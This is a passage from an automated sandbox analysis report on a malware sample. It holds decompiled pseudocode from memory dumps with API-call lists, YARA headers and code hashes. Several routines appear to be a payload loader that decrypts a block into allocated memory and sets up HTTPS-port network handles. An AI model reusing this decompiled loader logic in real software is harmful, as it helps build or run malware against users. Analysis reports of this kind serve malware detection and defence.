                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L12;
                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                0x02b81bea
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02b81be8
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 02B81BB8
                                                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,?,?,?), ref: 02B81C2D
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02B81C33
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ProtectVirtual$ErrorLast
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 1469625949-1084903527
                                                                                                                                                                                                                                • Opcode ID: ebdc20a3b7c333ec662d3ec7c1d2a8b8bba5f430d8f877bef071e8c055ea8ca2
                                                                                                                                                                                                                                • Instruction ID: 15afa2fc140c20e87ae14e5abf80d5dc49a6407506f4c91f54509c88b7598b20
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebdc20a3b7c333ec662d3ec7c1d2a8b8bba5f430d8f877bef071e8c055ea8ca2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A215C7191120ADFCB14EF89C881ABAF7F4FB08344F41489AD20ADB004E7B4A666DF58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                                                			E02B817CE(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                                                				unsigned int _v24;
                                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                                                				void* _v36;
                                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                                				void* _v44;
                                                                                                                                                                                                                                				signed int _v52;
                                                                                                                                                                                                                                				signed int _v56;
                                                                                                                                                                                                                                				intOrPtr _t52;
                                                                                                                                                                                                                                				void* _t59;
                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                				void* _t71;
                                                                                                                                                                                                                                				intOrPtr _t72;
                                                                                                                                                                                                                                				intOrPtr _t79;
                                                                                                                                                                                                                                				intOrPtr _t84;
                                                                                                                                                                                                                                				intOrPtr* _t86;
                                                                                                                                                                                                                                				intOrPtr _t89;
                                                                                                                                                                                                                                				intOrPtr _t91;
                                                                                                                                                                                                                                				void* _t92;
                                                                                                                                                                                                                                				intOrPtr _t94;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t91 =  *0x2b841b0;
                                                                                                                                                                                                                                				_t52 = E02B81917(_t91,  &_v32,  &_v24);
                                                                                                                                                                                                                                				_v28 = _t52;
                                                                                                                                                                                                                                				if(_t52 == 0) {
                                                                                                                                                                                                                                					asm("sbb ebx, ebx");
                                                                                                                                                                                                                                					_t69 =  ~( ~(_v24 & 0x00000fff)) + (_v24 >> 0xc);
                                                                                                                                                                                                                                					_t92 = _t91 + _v32;
                                                                                                                                                                                                                                					_v44 = _t92;
                                                                                                                                                                                                                                					_t59 = VirtualAlloc(0, _t69 << 0xc, 0x3000, 4); // executed
                                                                                                                                                                                                                                					_t71 = _t59;
                                                                                                                                                                                                                                					_v36 = _t71;
                                                                                                                                                                                                                                					if(_t71 == 0) {
                                                                                                                                                                                                                                						_v28 = 8;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                						if(_t69 <= 0) {
                                                                                                                                                                                                                                							_t72 =  *0x2b841c0;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t84 = _a4;
                                                                                                                                                                                                                                							_v12 = _t92;
                                                                                                                                                                                                                                							_v12 = _v12 - _t71;
                                                                                                                                                                                                                                							_t16 = _t84 + 0x2b851a7; // 0x3220a9c2
                                                                                                                                                                                                                                							_t63 = _t59 - _t92 + _t16;
                                                                                                                                                                                                                                							_v20 = _t71;
                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                								asm("movsd");
                                                                                                                                                                                                                                								asm("movsd");
                                                                                                                                                                                                                                								asm("movsd");
                                                                                                                                                                                                                                								_v16 = 0x400;
                                                                                                                                                                                                                                								_t94 = 0;
                                                                                                                                                                                                                                								_t86 = _v20;
                                                                                                                                                                                                                                								_v40 = (_v56 ^ _v52) - _v8 + _v32 + _a4 - 1;
                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                									_t79 =  *((intOrPtr*)(_v12 + _t86));
                                                                                                                                                                                                                                									_t89 = _t79;
                                                                                                                                                                                                                                									if(_t79 == 0) {
                                                                                                                                                                                                                                										_v16 = 1;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										 *_t86 = _t79 + _t94 - _v40;
                                                                                                                                                                                                                                										_t94 = _t89;
                                                                                                                                                                                                                                										_t86 = _t86 + 4;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_t33 =  &_v16;
                                                                                                                                                                                                                                									 *_t33 = _v16 - 1;
                                                                                                                                                                                                                                								} while ( *_t33 != 0);
                                                                                                                                                                                                                                								_v20 = _v20 + 0x1000;
                                                                                                                                                                                                                                								_t72 =  *((intOrPtr*)(_t63 + 0xc)) -  *((intOrPtr*)(_t63 + 8)) +  *((intOrPtr*)(_t63 + 4));
                                                                                                                                                                                                                                								_v8 = _v8 + 1;
                                                                                                                                                                                                                                								 *0x2b841c0 = _t72;
                                                                                                                                                                                                                                							} while (_v8 < _t69);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						if(_t72 != 0x69b25f44) {
                                                                                                                                                                                                                                							_v28 = 9;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							memcpy(_v44, _v36, _v24);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						VirtualFree(_v36, 0, 0x8000); // executed
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v28;
                                                                                                                                                                                                                                			}





























                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000030,?,00000000,00000000,?,?,?,?,?,?,?,02B815E1), ref: 02B81824
                                                                                                                                                                                                                                • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,?,?,02B815E1,00000000,00000030,747863F0,00000000), ref: 02B818E4
                                                                                                                                                                                                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02B818FF
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                                • String ID: Oct 27 2021
                                                                                                                                                                                                                                • API String ID: 4010158826-1702575778
                                                                                                                                                                                                                                • Opcode ID: 12d205c521ab05359e345cd2f882cb82816cba8eb4dad961dac7d78c708f8928
                                                                                                                                                                                                                                • Instruction ID: 6626969cffee2e8a88c0c09fd43f72f93e2df9a411d36270a049ac08f8bd7831
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12d205c521ab05359e345cd2f882cb82816cba8eb4dad961dac7d78c708f8928
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0417E71D1121ADFDB04DF98D891BEEBBB9FF08304F1041A9D909B7240D770AA46CB90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(80000002), ref: 02BB4AC7
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(02BB48F5), ref: 02BB4B0B
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB4B1F
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02BB4B2D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 344208780-0
                                                                                                                                                                                                                                • Opcode ID: 3c2b4b6518d435a5e010a2bb9fe12f4ce8b32af8c1416abb63c83f49cb2ed228
                                                                                                                                                                                                                                • Instruction ID: f7dfe7b12cd2c2cb80fdba6732fcd702aa3c94f4e4436a2678459ff4640c7d57
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c2b4b6518d435a5e010a2bb9fe12f4ce8b32af8c1416abb63c83f49cb2ed228
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D313B76900209EFCB16CF98D8D0AEE7BB9FF08340B10846EEA0697251D7B09A41CF65
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                			E02B81EB4(void* __ecx, char _a4) {
                                                                                                                                                                                                                                				long _t3;
                                                                                                                                                                                                                                				int _t4;
                                                                                                                                                                                                                                				int _t9;
                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t13 = GetCurrentThread();
                                                                                                                                                                                                                                				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                                                                                                                                                                                				if(_t3 != 0) {
                                                                                                                                                                                                                                					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t4 = E02B8156C(_a4); // executed
                                                                                                                                                                                                                                				_t9 = _t4;
                                                                                                                                                                                                                                				if(_t9 == 0) {
                                                                                                                                                                                                                                					SetThreadPriority(_t13, _t4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                				return _t9;
                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 02B81EB7
                                                                                                                                                                                                                                • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 02B81EC2
                                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000,000000FF), ref: 02B81ED5
                                                                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 02B81EE8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1452675757-0
                                                                                                                                                                                                                                • Opcode ID: 36866f42513d02de4349aef9e0b6773589b59ed260e33b78f80ea553d2e11b41
                                                                                                                                                                                                                                • Instruction ID: 283da1d4f46757f99776b394d8be5d822a3a02016428235f43213db63b3342ff
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36866f42513d02de4349aef9e0b6773589b59ed260e33b78f80ea553d2e11b41
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28E09232B162116B92217A2D9C94F7B7BECEF92771B0102A5F62DD72D0CB908C12C9A5
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 23%
                                                                                                                                                                                                                                			E02BB7648(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                				long _t36;
                                                                                                                                                                                                                                				unsigned int _t37;
                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                				intOrPtr _t39;
                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                				intOrPtr _t42;
                                                                                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                                                                                				intOrPtr _t45;
                                                                                                                                                                                                                                				void* _t56;
                                                                                                                                                                                                                                				intOrPtr _t57;
                                                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                                                				intOrPtr* _t65;
                                                                                                                                                                                                                                				intOrPtr* _t66;
                                                                                                                                                                                                                                				void* _t69;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t66 = __esi;
                                                                                                                                                                                                                                				_t63 = E02BB3037(_t34, _a4);
                                                                                                                                                                                                                                				if(_t63 == 0) {
                                                                                                                                                                                                                                					L18:
                                                                                                                                                                                                                                					_t36 = GetLastError();
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t37 = GetVersion();
                                                                                                                                                                                                                                					_t69 = _t37 - 6;
                                                                                                                                                                                                                                					if(_t69 > 0) {
                                                                                                                                                                                                                                						L5:
                                                                                                                                                                                                                                						_a4 = 4;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						if(_t69 != 0) {
                                                                                                                                                                                                                                							L4:
                                                                                                                                                                                                                                							_a4 = 0;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t37 = _t37 >> 8;
                                                                                                                                                                                                                                							if(_t37 > 2) {
                                                                                                                                                                                                                                								goto L5;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								goto L4;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					__imp__(_t63, _a4, 0, 0, 0); // executed
                                                                                                                                                                                                                                					 *(_t66 + 0x10) = _t37;
                                                                                                                                                                                                                                					_t38 = E02BB53BB(_t63);
                                                                                                                                                                                                                                					if( *(_t66 + 0x10) == 0) {
                                                                                                                                                                                                                                						goto L18;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t39 = E02BB3037(_t38,  *_t66);
                                                                                                                                                                                                                                						_v8 = _t39;
                                                                                                                                                                                                                                						if(_t39 == 0) {
                                                                                                                                                                                                                                							goto L18;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t65 = __imp__; // 0x7021f5a0
                                                                                                                                                                                                                                							if(_a8 == 0) {
                                                                                                                                                                                                                                								L10:
                                                                                                                                                                                                                                								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
                                                                                                                                                                                                                                								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
                                                                                                                                                                                                                                								_t40 = E02BB53BB(_v8);
                                                                                                                                                                                                                                								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
                                                                                                                                                                                                                                									goto L18;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_a4 = 0x800100;
                                                                                                                                                                                                                                									_t56 = E02BB3037(_t40,  *((intOrPtr*)(_t66 + 4)));
                                                                                                                                                                                                                                									if(_t56 == 0) {
                                                                                                                                                                                                                                										goto L18;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t42 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                										_t19 = _t42 + 0x2bbe758; // 0x450047
                                                                                                                                                                                                                                										_t43 = _t19;
                                                                                                                                                                                                                                										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
                                                                                                                                                                                                                                										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
                                                                                                                                                                                                                                										E02BB53BB(_t56);
                                                                                                                                                                                                                                										_t45 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                                                                                                                                                                										if(_t45 == 0) {
                                                                                                                                                                                                                                											goto L18;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											_t57 = 4;
                                                                                                                                                                                                                                											_v12 = _t57;
                                                                                                                                                                                                                                											__imp__(_t45, 0x1f,  &_a4,  &_v12);
                                                                                                                                                                                                                                											if(_t45 != 0) {
                                                                                                                                                                                                                                												_a4 = _a4 | 0x00000100;
                                                                                                                                                                                                                                												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                											_push(_t57);
                                                                                                                                                                                                                                											_push( &_a8);
                                                                                                                                                                                                                                											_push(6);
                                                                                                                                                                                                                                											_push( *((intOrPtr*)(_t66 + 0x18)));
                                                                                                                                                                                                                                											if( *_t65() == 0) {
                                                                                                                                                                                                                                												goto L18;
                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                												_push(_t57);
                                                                                                                                                                                                                                												_push( &_a8);
                                                                                                                                                                                                                                												_push(5);
                                                                                                                                                                                                                                												_push( *((intOrPtr*)(_t66 + 0x18)));
                                                                                                                                                                                                                                												if( *_t65() == 0) {
                                                                                                                                                                                                                                													goto L18;
                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                													_t36 = 0;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
                                                                                                                                                                                                                                								if(_t39 == 0) {
                                                                                                                                                                                                                                									goto L18;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									goto L10;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t36;
                                                                                                                                                                                                                                			}





















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: lstrlen.KERNEL32(?,00000000,052F9BB8,00000000,02BB6F37,052F9D96,?,?,?,?,?,69B25F44,00000005,02BBD00C), ref: 02BB303E
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: mbstowcs.NTDLL ref: 02BB3067
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: memset.NTDLL ref: 02BB3079
                                                                                                                                                                                                                                • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,02BB2E91,00000000,00000000,052F9618,?,?,02BB21A4,?,052F9618,0000EA60), ref: 02BB7663
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,02BB2E91,00000000,00000000,052F9618,?,?,02BB21A4,?,052F9618,0000EA60), ref: 02BB778E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 4097109750-1701360479
                                                                                                                                                                                                                                • Opcode ID: 3b3dc4374b61b6ff2d6fdaee6d022c4e00038081041df147cd734fcbda514b9f
                                                                                                                                                                                                                                • Instruction ID: 3b94b21d3c066469da50b5340124e36f7fe794047232ed1b5e91b8c026b92654
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b3dc4374b61b6ff2d6fdaee6d022c4e00038081041df147cd734fcbda514b9f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B418372500209BFDB239FA5CC84EFABBB9EF44784F1045A9F64296450DBF1DA44DB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB2AE3(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                                                                                                                                				struct _FILETIME _v12;
                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                				void* _t16;
                                                                                                                                                                                                                                				short _t19;
                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                                                				short* _t26;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t24 = __edx;
                                                                                                                                                                                                                                				_t25 = E02BB3037(_t11, _a12);
                                                                                                                                                                                                                                				if(_t25 == 0) {
                                                                                                                                                                                                                                					_t22 = 8;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t26 = _t25 + _a16 * 2;
                                                                                                                                                                                                                                					 *_t26 = 0; // executed
                                                                                                                                                                                                                                					_t16 = E02BB9DA2(__ecx, _a4, _a8, _t25); // executed
                                                                                                                                                                                                                                					_t22 = _t16;
                                                                                                                                                                                                                                					if(_t22 == 0) {
                                                                                                                                                                                                                                						GetSystemTimeAsFileTime( &_v12);
                                                                                                                                                                                                                                						_t19 = 0x5f;
                                                                                                                                                                                                                                						 *_t26 = _t19;
                                                                                                                                                                                                                                						_t22 = E02BB9BAF(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					HeapFree( *0x2bbd270, 0, _t25);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t22;
                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: lstrlen.KERNEL32(?,00000000,052F9BB8,00000000,02BB6F37,052F9D96,?,?,?,?,?,69B25F44,00000005,02BBD00C), ref: 02BB303E
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: mbstowcs.NTDLL ref: 02BB3067
                                                                                                                                                                                                                                  • Part of subcall function 02BB3037: memset.NTDLL ref: 02BB3079
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,052F9364), ref: 02BB2B1B
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,052F9364), ref: 02BB2B49
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 1500278894-1536154274
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                                                                                                			E02BB5341(char* _a4, char** _a8) {
                                                                                                                                                                                                                                				char* _t7;
                                                                                                                                                                                                                                				char* _t11;
                                                                                                                                                                                                                                				char* _t14;
                                                                                                                                                                                                                                				char* _t16;
                                                                                                                                                                                                                                				char* _t17;
                                                                                                                                                                                                                                				char _t18;
                                                                                                                                                                                                                                				signed int _t20;
                                                                                                                                                                                                                                				signed int _t22;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t16 = _a4;
                                                                                                                                                                                                                                				_push(0x20);
                                                                                                                                                                                                                                				_t20 = 1;
                                                                                                                                                                                                                                				_push(_t16);
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					_t7 = StrChrA();
                                                                                                                                                                                                                                					if(_t7 == 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t20 = _t20 + 1;
                                                                                                                                                                                                                                					_push(0x20);
                                                                                                                                                                                                                                					_push( &(_t7[1]));
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t11 = E02BB5157(_t20 << 2);
                                                                                                                                                                                                                                				_a4 = _t11;
                                                                                                                                                                                                                                				if(_t11 != 0) {
                                                                                                                                                                                                                                					StrTrimA(_t16, 0x2bbc2a4); // executed
                                                                                                                                                                                                                                					_t22 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t14 = StrChrA(_t16, 0x20);
                                                                                                                                                                                                                                						if(_t14 != 0) {
                                                                                                                                                                                                                                							 *_t14 = 0;
                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                								_t14 =  &(_t14[1]);
                                                                                                                                                                                                                                								_t18 =  *_t14;
                                                                                                                                                                                                                                							} while (_t18 == 0x20 || _t18 == 9);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t17 = _a4;
                                                                                                                                                                                                                                						 *(_t17 + _t22 * 4) = _t16;
                                                                                                                                                                                                                                						_t22 = _t22 + 1;
                                                                                                                                                                                                                                						_t16 = _t14;
                                                                                                                                                                                                                                					} while (_t14 != 0);
                                                                                                                                                                                                                                					 *_a8 = _t17;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                			}











                                                                                                                                                                                                                                0x02bb538c
                                                                                                                                                                                                                                0x02bb538f
                                                                                                                                                                                                                                0x02bb538f
                                                                                                                                                                                                                                0x02bb5390
                                                                                                                                                                                                                                0x02bb5392
                                                                                                                                                                                                                                0x02bb538f
                                                                                                                                                                                                                                0x02bb539c
                                                                                                                                                                                                                                0x02bb539f
                                                                                                                                                                                                                                0x02bb53a2
                                                                                                                                                                                                                                0x02bb53a3
                                                                                                                                                                                                                                0x02bb53a5
                                                                                                                                                                                                                                0x02bb53ac
                                                                                                                                                                                                                                0x02bb53ac
                                                                                                                                                                                                                                0x02bb53b8

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrChrA.SHLWAPI(?,00000020,00000000,052F95AC,02BB5884,?,02BB461A,?,052F95AC,?,02BB5884), ref: 02BB535D
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(?,02BBC2A4,00000002,?,02BB461A,?,052F95AC,?,02BB5884), ref: 02BB537B
                                                                                                                                                                                                                                • StrChrA.SHLWAPI(?,00000020,?,02BB461A,?,052F95AC,?,02BB5884), ref: 02BB5386
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Trim
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3043112668-0
                                                                                                                                                                                                                                • Opcode ID: 3245e3e6cc31a91e6baef637decd9a9d8afdb5f0f51828592788d145206ce460
